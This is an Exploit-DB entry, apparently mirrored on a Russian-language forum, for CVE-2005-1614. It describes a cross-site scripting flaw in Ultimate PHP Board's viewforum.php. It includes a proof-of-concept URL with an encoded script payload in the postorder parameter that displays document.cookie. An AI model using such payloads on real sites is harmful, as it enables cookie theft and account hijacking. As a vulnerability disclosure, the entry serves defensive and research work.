- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25654
- Проверка EDB
-
- Пройдено
- Автор
- MORINEX ENECO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-1614
- Дата публикации
- 2005-05-13
Код:
source: https://www.securityfocus.com/bid/13621/info
Ultimate PHP Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/forum/viewforum.php?id=t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3Cnote%20unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61
%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C')%20==%20'%22%3E<script
>alert(document.cookie)</script>%3C
- Источник
- www.exploit-db.com